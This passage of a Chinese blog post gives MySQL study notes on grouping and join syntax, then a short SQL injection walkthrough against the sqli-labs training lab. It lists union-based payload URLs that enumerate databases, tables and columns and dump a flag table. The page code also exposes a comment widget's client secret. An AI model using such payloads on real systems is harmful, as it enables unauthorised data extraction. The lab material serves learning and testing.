<td style="text-align:center">group by 子句的后面</td>
<td style="text-align:center">having</td>
</tr>
</tbody>
</table>
<p>分组函数做条件必然放在 having 中，且优先考虑能用分组前筛选的（效率高）</p>
<ol start="2">
<li>group by 子句支持单个字段分组，多个字段分组（多个字段之间用逗号隔开没有顺序要求），表达式或函数</li>
<li>添加排序，置于整个分组查询的最后</li>
</ol>
<h4 id="连接查询"><a href="#连接查询" class="headerlink" title="连接查询"></a>连接查询</h4><p>当需要同时查询多个表的数据使用。若无有效的连接条件，则为笛卡儿积</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">select 字段<span class="number">1</span>,字段<span class="number">2</span>,...</span><br><span class="line"><span class="keyword">from</span> 表<span class="number">1</span>, 表<span class="number">2</span>,...</span><br></pre></td></tr></table></figure>
<p>年代分类：</p>
<ul>
<li><strong>sql192版本</strong></li>
</ul>
<p>等值，非等值，自连接，也支持一部分外连接(用于oracle，sqlserver，mysql不支持)</p>
<p><strong>等值连接</strong></p>
<figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> 查询列表</span><br><span class="line"><span class="keyword">from</span> 表<span class="number">1</span> [别名<span class="number">1</span>],表<span class="number">2</span> [别名<span class="number">2</span>],...</span><br><span class="line"><span class="keyword">where</span> 表<span class="number">1.</span>字段 = 表<span class="number">2.</span>字段</span><br><span class="line">[<span class="keyword">and</span> 筛选条件]</span><br><span class="line">[<span class="keyword">group</span> <span class="keyword">by</span> 分组字段]</span><br><span class="line">[<span class="keyword">having</span> 分组后的筛选]</span><br><span class="line">[<span class="keyword">order</span> <span class="keyword">by</span> 排序字段]</span><br></pre></td></tr></table></figure>
<p>注意：<br>1.防止表字段名重复，通常给表起别名，也是为了缩短查询语句<br>2.多表无主从之分，即没有顺序<br>3.n表查询至少需要n-1个连接条件<br>4.查询结果为多表的交集部分</p>
<p><strong>非等值连接</strong></p>
<figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> 查询列表</span><br><span class="line"><span class="keyword">from</span> 表<span class="number">1</span> [别名<span class="number">1</span>],表<span class="number">2</span> [别名<span class="number">2</span>],...</span><br><span class="line"><span class="keyword">where</span> 非等值条件</span><br><span class="line">[<span class="keyword">and</span> 筛选条件]</span><br><span class="line">[<span class="keyword">group</span> <span class="keyword">by</span> 分组字段]</span><br><span class="line">[<span class="keyword">having</span> 分组后的筛选]</span><br><span class="line">[<span class="keyword">order</span> <span class="keyword">by</span> 排序字段]</span><br></pre></td></tr></table></figure>
<p><strong>自连接</strong></p>
<p>同上</p>
<ul>
<li><strong>sql199版本</strong></li>
</ul>
<figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> 查询列表</span><br><span class="line"><span class="keyword">from</span> 表<span class="number">1</span> 别名 </span><br><span class="line">[连接类型关键字] <span class="keyword">join</span> 表<span class="number">2</span> 别名 </span><br><span class="line"><span class="keyword">on</span> 连接条件</span><br><span class="line">[<span class="keyword">where</span> 筛选条件]</span><br><span class="line">[<span class="keyword">group</span> <span class="keyword">by</span> 分组字段]</span><br><span class="line">[<span class="keyword">having</span> 分组后的筛选]</span><br><span class="line">[<span class="keyword">order</span> <span class="keyword">by</span> 排序字段]</span><br></pre></td></tr></table></figure>
<p><strong>连接类型</strong></p>
<p><strong>内连接</strong>：可以理解为对两个表并集运算再加筛选条件，其中有等值连接，非等值连接，自连接，关键字为：inner<br>具体语法类型192版本，可省略 inner关键字，如下</p>
<figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> 查询列表</span><br><span class="line"><span class="keyword">from</span> 表<span class="number">1</span> 别名 </span><br><span class="line">[<span class="keyword">inner</span>] <span class="keyword">join</span> 表<span class="number">2</span> 别名 </span><br><span class="line"><span class="keyword">on</span> 连接条件</span><br><span class="line">[<span class="keyword">where</span> 筛选条件]</span><br><span class="line">[<span class="keyword">group</span> <span class="keyword">by</span> 分组字段]</span><br><span class="line">[<span class="keyword">having</span> 分组后的筛选]</span><br><span class="line">[<span class="keyword">order</span> <span class="keyword">by</span> 排序字段]</span><br><span class="line"><span class="keyword">limit</span> [子句]</span><br></pre></td></tr></table></figure>
<p><strong>外连接</strong>：outer<br>用于查询一个表中有，另一个表没有的记录。可以理解为对两个表交集运算再加筛选条件。<br>外连接查询的结果为主表中的所有记录<br>如果从表能与之匹配，则显示匹配的值<br>如果从表不能匹配他，则显示NULL<br>外连接查询的结果 = 内连接结果 + 主表中有而从表没有的记录，即</p>
<p>左外，left [outer] ，左为主表<br>右外，right [outer] ，右为主表，左外右外交换两个表的顺序可以实现相同效果<br>全外(mysql不支持) full [outer] ，全外连接 = 内连接的结果 + 表1中有而表2无 + 表2中有而表1无(或者说，全外连接 = 表1 U 表 2)</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> 查询列表</span><br><span class="line"><span class="keyword">from</span> 表<span class="number">1</span> 别名 </span><br><span class="line"><span class="keyword">left</span>|<span class="keyword">right</span>|<span class="keyword">full</span> [<span class="keyword">outer</span>] <span class="keyword">join</span> 表<span class="number">2</span> 别名 </span><br><span class="line"><span class="keyword">on</span> 连接条件</span><br><span class="line">[<span class="keyword">where</span> 筛选条件]</span><br><span class="line">[<span class="keyword">group</span> <span class="keyword">by</span> 分组字段]</span><br><span class="line">[<span class="keyword">having</span> 分组后的筛选]</span><br><span class="line">[<span class="keyword">order</span> <span class="keyword">by</span> 排序字段]</span><br><span class="line"><span class="keyword">limit</span> [子句]</span><br></pre></td></tr></table></figure>
<p><strong>交叉连接</strong>：cross</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> 查询列表</span><br><span class="line"><span class="keyword">from</span> 表<span class="number">1</span> 别名</span><br><span class="line"><span class="keyword">cross</span> <span class="keyword">join</span> 表<span class="number">2</span> 别名</span><br></pre></td></tr></table></figure>
<p>实质上就是笛卡儿积</p>
<h2 id="MYSQL注入"><a href="#MYSQL注入" class="headerlink" title="MYSQL注入"></a>MYSQL注入</h2><h3 id="select注入"><a href="#select注入" class="headerlink" title="select注入"></a>select注入</h3><p>找到注入点，<code>union</code>注入，查库，查表、查数据</p>
<p>这里拿<code>sql-labs</code>作为例子，常见的<code>select</code>回显注入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">判断查询字段数</span><br><span class="line">http:&#x2F;&#x2F;192.168.10.109&#x2F;Less-41&#x2F;?id&#x3D;1 order by 4#</span><br><span class="line">http:&#x2F;&#x2F;192.168.10.109&#x2F;Less-41&#x2F;?id&#x3D;1 order by 3#</span><br><span class="line"></span><br><span class="line">查看回显数据</span><br><span class="line">http:&#x2F;&#x2F;192.168.10.109&#x2F;Less-41&#x2F;?id&#x3D;-1 union select 1,2,3#</span><br><span class="line"></span><br><span class="line">查看当前用户、数据库名称</span><br><span class="line">http:&#x2F;&#x2F;192.168.10.109&#x2F;Less-41&#x2F;?id&#x3D;-1 union select 1,user(),database()#</span><br><span class="line"></span><br><span class="line">查所有数据库</span><br><span class="line">http:&#x2F;&#x2F;192.168.10.109&#x2F;Less-41&#x2F;?id&#x3D;-1 union select 1,user(),group_concat(schema_name) from information_schema.schemata --+</span><br><span class="line"></span><br><span class="line">通过表名的hex值或者表名查某个库的表(不过这题需要用hex值)，hex值可以用python的</span><br><span class="line">http:&#x2F;&#x2F;192.168.10.109&#x2F;Less-41&#x2F;?id&#x3D;-1 union select 1,user(),group_concat(table_name) from information_schema.tables where table_schema&#x3D;flag --+</span><br><span class="line"></span><br><span class="line">http:&#x2F;&#x2F;192.168.10.109&#x2F;Less-41&#x2F;?id&#x3D;-1 union select 1,user(),group_concat(table_name) from information_schema.tables where table_schema&#x3D;0x666C6167 --+</span><br><span class="line"></span><br><span class="line">查询表的字段名</span><br><span class="line">http:&#x2F;&#x2F;192.168.10.109&#x2F;Less-41&#x2F;?id&#x3D;-1 union select 1,user(),group_concat(column_name) from information_schema.columns where table_name&#x3D;0x666C61677461626C65--+</span><br><span class="line"></span><br><span class="line">查表数据</span><br><span class="line">http:&#x2F;&#x2F;192.168.10.109&#x2F;Less-41&#x2F;?id&#x3D;-1 union select 1,user(),group_concat(id,0x3A,flag) from flag.flagtable--+</span><br></pre></td></tr></table></figure>
<p><strong>注意：</strong></p>
<ul>
<li>失效尝试使用 --+</li>
<li>了解盲注和普通的SQL注入原理是一样的，不同在哪里？</li>
<li>通过SQLiLabs学习sql注入</li>
<li>识别sql注入漏洞点，利用SQL语句拆解整个数据库结构，最后提取出我们要的flag表中信息</li>
</ul>
</div><div class="article-tags size-small is-uppercase mb-4"><span class="mr-2">#</span><a class="link-muted mr-2" rel="tag" href="/tags/MYSQL/">MYSQL</a><a class="link-muted mr-2" rel="tag" href="/tags/%E7%AC%94%E8%AE%B0/">笔记</a></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/css/share.min.css"><div class="social-share"></div><script src="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/js/social-share.min.js"></script></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2016/06/27/2016/%E5%B0%8F%E7%99%BD%E7%9A%84PWN%E5%AD%A6%E4%B9%A0%E4%B9%8B%E8%B7%AF/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">小白的PWN学习之路</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2016/04/04/2016/MIPS%20%E6%B1%87%E7%BC%96%E7%AE%80%E5%8D%95%E5%AD%A6%E4%B9%A0/"><span class="level-item">MIPS 汇编简单学习</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><div class="card"><div class="card-content"><h3 class="title is-5">评论</h3><div id="comment-container"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1.6.2/dist/gitalk.css"><script src="https://cdn.jsdelivr.net/npm/gitalk@1.6.2/dist/gitalk.min.js"></script><script>var gitalk = new Gitalk({
            id: '9671d2da85124cccef27651f3f4543f5',
            repo: 'res',
            owner: 'white3',
            clientID: '6aca1d1f0f587ffa3e7f',
            clientSecret: 'c38ba1f21f746a71269aed2e066f454513da000c',
            admin: "white3",
            createIssueManually: false,
            distractionFreeMode: false,
            perPage: 10,
            pagerDirection: 'last',
            
            
            enableHotKey: true
        })
        gitalk.render('comment-container')</script></div></div></div><div class="column column-left is-4-tablet is-4-desktop is-3-widescreen  order-1 is-sticky"><div class="card widget" id="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">目录</h3><ul class="menu-list"><li><a class="is-flex" href="#SQL注入的分类："><span class="mr-2">1</span><span>SQL注入的分类：</span></a></li><li><a class="is-flex" href="#DQL语言"><span class="mr-2">2</span><span>DQL语言</span></a><ul class="menu-list"><li><a class="is-flex" href="#SELECT"><span class="mr-2">2.1</span><span>SELECT</span></a><ul class="menu-list"><li><a class="is-flex" href="#基础查询："><span class="mr-2">2.1.1</span><span>基础查询：</span></a></li><li><a class="is-flex" href="#条件查询："><span class="mr-2">2.1.2</span><span>条件查询：</span></a></li><li><a class="is-flex" href="#排序查询"><span class="mr-2">2.1.3</span><span>排序查询</span></a></li><li><a class="is-flex" href="#分组函数"><span class="mr-2">2.1.4</span><span>分组函数</span></a></li><li><a class="is-flex" href="#分组查询"><span class="mr-2">2.1.5</span><span>分组查询</span></a></li><li><a class="is-flex" href="#连接查询"><span class="mr-2">2.1.6</span><span>连接查询</span></a></li></ul></li></ul></li><li><a class="is-flex" href="#MYSQL注入"><span class="mr-2">3</span><span>MYSQL注入</span></a><ul class="menu-list"><li><a class="is-flex" href="#select注入"><span class="mr-2">3.1</span><span>select注入</span></a></li></ul></li></ul></div></div></div><div class="card widget"><div class="card-content"><div class="menu"><h3 class="menu-label">链接</h3><ul class="menu-list"><li><a class="level is-mobile is-mobile" href="https://etenal.me/" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">ETenal</span></span><span class="level-right"><span class="level-item tag">etenal.me</span></span></a></li><li><a class="level is-mobile is-mobile" href="https://www.wtnpmt.space/" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">PMT</span></span><span class="level-right"><span class="level-item tag">www.wtnpmt.space</span></span></a></li><li><a class="level is-mobile is-mobile" href="https://gfalisa.github.io/" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">GFAlisa</span></span><span class="level-right"><span class="level-item tag">gfalisa.github.io</span></span></a></li><li><a class="level is-mobile is-mobile" href="https://www.se7ensec.cn/" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">Sen7en</span></span><span class="level-right"><span class="level-item tag">www.se7ensec.cn</span></span></a></li></ul></div></div></div><div class="card widget"><div class="card-content"><h3 class="menu-label">最新文章</h3><article class="media"><div class="media-content size-small"><p><time dateTime="2020-04-03T00:00:00.000Z">2020-04-03</time></p><p class="title is-6"><a class="link-muted" href="/2020/04/03/2020/0005.%E5%8D%9A%E5%AE%A2%E4%B8%BB%E9%A2%98%E6%9B%B4%E6%96%B0%E4%B8%BAicarus/">Icarus Theme</a></p><p class="is-uppercase"><a class="link-muted" href="/categories/%E7%94%9F%E6%B4%BB%E6%8A%98%E8%85%BE%E7%AF%87/">生活折腾篇</a></p></div></article><article class="media"><div class="media-content size-small"><p><time dateTime="2020-04-02T00:00:00.000Z">2020-04-02</time></p><p class="title is-6"><a class="link-muted" href="/2020/04/02/2020/0004.%E6%9C%8D%E5%8A%A1%E9%92%93%E9%B1%BC%20Responder/">Responder</a></p><p class="is-uppercase"><a class="link-muted" href="/categories/%E5%AE%89%E5%85%A8%E5%AE%9E%E9%AA%8C%E7%AF%87/">安全实验篇</a></p></div></article><article class="media"><div class="media-content size-small"><p><time dateTime="2020-04-01T00:00:00.000Z">2020-04-01</time></p><p class="title is-6"><a class="link-muted" href="/2020/04/01/2020/0003.Zoom%20UNC%20injection/">Zoom UNC injection</a></p><p class="is-uppercase"><a class="link-muted" href="/categories/%E5%AE%89%E5%85%A8%E5%AE%9E%E9%AA%8C%E7%AF%87/">安全实验篇</a></p></div></article><article class="media"><div class="media-content size-small"><p><time dateTime="2020-03-16T00:00:00.000Z">2020-03-16</time></p><p class="title is-6"><a class="link-muted" href="/2020/03/16/2020/0002.terminal%E6%94%B9%E9%80%A0/">terminal改造</a></p><p class="is-uppercase"><a class="link-muted" href="/categories/%E7%94%9F%E6%B4%BB%E6%8A%98%E8%85%BE%E7%AF%87/">生活折腾篇</a></p></div></article><article class="media"><div class="media-content size-small"><p><time dateTime="2020-03-10T00:00:00.000Z">2020-03-10</time></p><p class="title is-6"><a class="link-muted" href="/2020/03/10/2020/0001.Contest%20for%20Robots/">A. Contest for Robots</a></p><p class="is-uppercase"><a class="link-muted" href="/categories/%E5%BC%80%E5%8F%91%E5%BC%BA%E5%8C%96%E7%AF%87/">开发强化篇</a></p></div></article></div></div><div class="card widget"><div class="card-content"><div class="menu"><h3 class="menu-label">标签</h3><div class="field is-grouped is-grouped-multiline"><div class="control"><a class="tags has-addons" href="/tags/CURL/"><span class="tag">CURL</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/CVE/"><span class="tag">CVE</span><span class="tag is-grey-lightest">4</span></a></div><div class="control"><a class="tags has-addons" href="/tags/HTTP/"><span class="tag">HTTP</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Java/"><span class="tag">Java</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Java-Web/"><span class="tag">Java Web</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Linux/"><span class="tag">Linux</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/MIPS-asm/"><span class="tag">MIPS - asm</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/MYSQL/"><span class="tag">MYSQL</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Maven/"><span class="tag">Maven</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/PWN/"><span class="tag">PWN</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Python/"><span class="tag">Python</span><span class="tag is-grey-lightest">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/SQL%E6%B3%A8%E5%85%A5/"><span class="tag">SQL注入</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/Tools/"><span class="tag">Tools</span><span class="tag is-grey-lightest">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/UNC-injection/"><span class="tag">UNC injection</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/algorithm/"><span class="tag">algorithm</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/docker/"><span class="tag">docker</span><span class="tag is-grey-lightest">5</span></a></div><div class="control"><a class="tags has-addons" href="/tags/java/"><span class="tag">java</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/question/"><span class="tag">question</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/relaxing/"><span class="tag">relaxing</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/strusts2/"><span class="tag">strusts2</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/struts2/"><span class="tag">struts2</span><span class="tag is-grey-lightest">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/themes/"><span class="tag">themes</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/web%E5%AE%89%E5%85%A8/"><span class="tag">web安全</span><span class="tag is-grey-lightest">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E5%85%AC%E5%91%8A/"><span class="tag">公告</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E5%86%85%E5%AD%98%E6%9D%A1/"><span class="tag">内存条</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E5%86%85%E7%BD%91/"><span class="tag">内网</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/"><span class="tag">内网渗透</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E5%B7%A5%E5%85%B7/"><span class="tag">工具</span><span class="tag is-grey-lightest">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E6%89%AB%E6%8F%8F/"><span class="tag">扫描</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E6%B8%97%E9%80%8F/"><span class="tag">渗透</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/"><span class="tag">漏洞复现</span><span class="tag is-grey-lightest">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E7%A7%BB%E5%8A%A8%E5%AE%89%E5%85%A8/"><span class="tag">移动安全</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E7%AC%94%E8%AE%B0/"><span class="tag">笔记</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E7%BC%96%E7%A0%81/"><span class="tag">编码</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E7%BC%96%E7%A8%8B/"><span class="tag">编程</span><span class="tag is-grey-lightest">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E8%99%9A%E6%8B%9F%E5%8C%96/"><span class="tag">虚拟化</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/"><span class="tag">计算机网络</span><span class="tag is-grey-lightest">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E9%9A%8F%E7%AC%94/"><span class="tag">随笔</span><span class="tag is-grey-lightest">1</span></a></div></div></div></div></div><div class="column-right-shadow is-hidden-widescreen"></div></div><div class="column column-right is-4-tablet is-4-desktop is-3-widescreen is-hidden-touch is-hidden-desktop-only order-3"><div class="card widget"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="" src="/img/avatar.png" alt="Menzel3"></figure><p class="title is-size-4 is-block line-height-inherit">Menzel3</p><p class="is-size-6 is-block">怕什么真理无穷，进一寸有一寸的欢喜</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>Earth</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">文章</p><a href="/archives"><p class="title">40</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">分类</p><a href="/categories"><p class="title">3</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">标签</p><a href="/tags"><p class="title">38</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/white3" target="_blank" rel="noopener">关注我</a></div><div class="level is-mobile"><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Github" href="https://github.com/white3"><i class="fab fa-github"></i></a></div></div></div></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/Maltose.png" alt="麦芽屋" height="28"></a><p class="size-small"><span>&copy; 2020 Menzel3</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a><br><span id="busuanzi_container_site_uv">共<span id="busuanzi_value_site_uv">0</span>个访客</span></p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script>moment.locale("zh-CN");</script><script>var IcarusThemeSettings = {
            site: {
                url: 'white3.github.io',
                external_link: {"enable":false,"exclude":[]}
            },
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/mathjax@2.7.5/unpacked/MathJax.js?config=TeX-MML-AM_CHTML" defer></script><script>window.addEventListener("load", function () {
            MathJax.Hub.Config({
                'HTML-CSS': {
                    matchFontHeight: false
                },
                SVG: {
                    matchFontHeight: false
                },
                CommonHTML: {
                    matchFontHeight: false
                },
                tex2jax: {
                    inlineMath: [
                        ['$','$'],
                        ['\\(','\\)']
                    ]
                }
            });
        });</script><!--!--><script src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>